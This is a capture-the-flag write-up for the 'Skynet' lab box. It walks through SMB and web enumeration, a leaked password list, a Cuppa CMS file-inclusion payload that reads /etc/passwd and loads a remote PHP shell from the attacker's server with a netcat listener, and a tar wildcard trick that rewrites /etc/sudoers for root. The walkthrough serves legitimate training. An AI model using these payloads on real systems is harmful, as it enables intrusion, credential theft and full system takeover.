CTF : Skynet
Informations
- IP: 10.10.221.206
- MYIP: 10.11.22.97
First enumeration
Basics
- NMAP
console$ nmap -p22,80,110,139,143,445 -A 10.10.221.206 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 21:43 CEST Nmap scan report for 10.10.221.206 Host is up (0.031s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 992331bbb1e943b756944cb9e82146c5 (RSA) | 256 57c07502712d193183dbe4fe679668cf (ECDSA) |_ 256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Skynet 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: AUTH-RESP-CODE TOP PIPELINING UIDL RESP-CODES CAPA SASL 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: IDLE listed ID SASL-IR ENABLE LOGINDISABLEDA0001 LOGIN-REFERRALS OK IMAP4rev1 more have capabilities post-login LITERAL+ Pre-login 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s | smb2-time: | date: 2023-04-13T19:44:10 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox) | smb2-security-mode: | 311: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: skynet | NetBIOS computer name: SKYNET\x00 | Domain name: \x00 | FQDN: skynet |_ System time: 2023-04-13T14:44:10-05:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.50 seconds
Vulnerabilities search
First let's explore smb shares :
console$ enum4linux -a 10.10.221.206 [...] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers anonymous Disk Skynet Anonymous Share milesdyson Disk Miles Dyson Personal Share IPC$ IPC IPC Service (skynet server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. [...] S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User) S-1-5-21-2393614426-3774336851-1116533619-513 SKYNET\None (Domain Group) S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\milesdyson (Local User) [...]
There is a wide open share named anonymous, let's see :
console$ smbclient //10.10.221.206/anonymous -U Anonymous smb: \> ls . D 0 Thu Nov 26 17:04:00 2020 .. D 0 Tue Sep 17 09:20:17 2019 attention.txt N 163 Wed Sep 18 05:04:59 2019 logs D 0 Wed Sep 18 06:42:16 2019 9204224 blocks of size 1024. 5831504 blocks available smb: \> get attention.txt smb: \> cd logs smb: \logs\> get log1.txt smb: \logs\> get log2.txt smb: \logs\> get log3.txt exit
Here is what we found :
console$ cat attention.txt A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson
console$ cat log1.txt cyborg007haloterminator terminator22596 terminator219 terminator20 terminator1989 terminator1988 terminator168 terminator16 terminator143 terminator13 terminator123!@# terminator1056 terminator101 terminator10 terminator02 terminator00 roboterminator pongterminator manasturcaluterminator exterminator95 exterminator200 dterminator djxterminator dexterminator determinator cyborg007haloterminator avsterminator alonsoterminator Walterminator 79terminator6 1996terminator
log1.txt seems to be a password list.
That's all for smb.
Now, we can give a try to web service :
console$ gobuster dir -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.221.206/ =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.221.206/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Follow Redirect: true [+] Timeout: 10s =============================================================== 2023/04/13 22:31:13 Starting gobuster in directory enumeration mode =============================================================== /admin (Status: 403) [Size: 278] /css (Status: 403) [Size: 278] /js (Status: 403) [Size: 278] /config (Status: 403) [Size: 278] /ai (Status: 403) [Size: 278] /squirrelmail (Status: 200) [Size: 2912]
squirrelmail is a webmail client so we can try to find milesdyson password.
Using those we found in log1.txt we manage to connect.
Miles received a mail containing his new samba password.
So, we can now explore his shared folder:
console$ smbclient //10.10.221.206/milesdyson -U milesdyson smb: \> cd notes smb: \notes\> ls . D 0 Tue Sep 17 11:18:40 2019 .. D 0 Tue Sep 17 11:05:47 2019 3.01 Search.md N 65601 Tue Sep 17 11:01:29 2019 4.01 Agent-Based Models.md N 5683 Tue Sep 17 11:01:29 2019 2.08 In Practice.md N 7949 Tue Sep 17 11:01:29 2019 0.00 Cover.md N 3114 Tue Sep 17 11:01:29 2019 1.02 Linear Algebra.md N 70314 Tue Sep 17 11:01:29 2019 important.txt N 117 Tue Sep 17 11:18:39 2019 6.01 pandas.md N 9221 Tue Sep 17 11:01:29 2019 3.00 Artificial Intelligence.md N 33 Tue Sep 17 11:01:29 2019 2.01 Overview.md N 1165 Tue Sep 17 11:01:29 2019 3.02 Planning.md N 71657 Tue Sep 17 11:01:29 2019 1.04 Probability.md N 62712 Tue Sep 17 11:01:29 2019 2.06 Natural Language Processing.md N 82633 Tue Sep 17 11:01:29 2019 2.00 Machine Learning.md N 26 Tue Sep 17 11:01:29 2019 1.03 Calculus.md N 40779 Tue Sep 17 11:01:29 2019 3.03 Reinforcement Learning.md N 25119 Tue Sep 17 11:01:29 2019 1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 11:01:29 2019 1.06 Bayesian Statistics.md N 39554 Tue Sep 17 11:01:29 2019 6.00 Appendices.md N 20 Tue Sep 17 11:01:29 2019 1.01 Functions.md N 7627 Tue Sep 17 11:01:29 2019 2.03 Neural Nets.md N 144726 Tue Sep 17 11:01:29 2019 2.04 Model Selection.md N 33383 Tue Sep 17 11:01:29 2019 2.02 Supervised Learning.md N 94287 Tue Sep 17 11:01:29 2019 4.00 Simulation.md N 20 Tue Sep 17 11:01:29 2019 3.05 In Practice.md N 1123 Tue Sep 17 11:01:29 2019 1.07 Graphs.md N 5110 Tue Sep 17 11:01:29 2019 2.07 Unsupervised Learning.md N 21579 Tue Sep 17 11:01:29 2019 2.05 Bayesian Learning.md N 39443 Tue Sep 17 11:01:29 2019 5.03 Anonymization.md N 2516 Tue Sep 17 11:01:29 2019 5.01 Process.md N 5788 Tue Sep 17 11:01:29 2019 1.09 Optimization.md N 25823 Tue Sep 17 11:01:29 2019 1.05 Statistics.md N 64291 Tue Sep 17 11:01:29 2019 5.02 Visualization.md N 940 Tue Sep 17 11:01:29 2019 5.00 In Practice.md N 21 Tue Sep 17 11:01:29 2019 4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 11:01:29 2019 1.10 Algorithms.md N 28790 Tue Sep 17 11:01:29 2019 3.04 Filtering.md N 13360 Tue Sep 17 11:01:29 2019 1.00 Foundations.md N 22 Tue Sep 17 11:01:29 2019 smb: \notes\> get important.txt exit
console$ cat important.txt 1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife
Alright we got a secret directory in web server
Let's explore it :
console$ gobuster dir -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.221.206/45kra24zxs28v3yd =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.221.206/45kra24zxs28v3yd [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Follow Redirect: true [+] Timeout: 10s =============================================================== 2023/04/13 22:46:55 Starting gobuster in directory enumeration mode =============================================================== /administrator (Status: 200) [Size: 4945]
console$ searchsploit cuppa ------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------- --------------------------------- Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt ------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results $ searchsploit -m php/webapps/25971.txt
As it's said in exploit file we got an exploit :
http://10.10.221.206/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Exploit
So I prepared a php remote shell and then served it via this command :
shellpython3 -m http.server 8000
Then on the attacker host
shellnc -nlvp 1234
And on the browser :
http://10.10.221.206/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.22.97:8000/shell.php
And we got a shell :)
Privilege escalation
Enumeration for privesc
There is a cron called every minute :
*/1 * * * * root /home/milesdyson/backups/backup.sh
console$ cat /home/milesdyson/backups/backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz *
Exploit
We can abuse the wildcard :
shellecho 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh echo "" > "--checkpoint-action=exec=sh privesc.sh" echo "" > --checkpoint=1
Then we wait for minute :)
And now :
console$ sudo -i # cat root.txt
\o/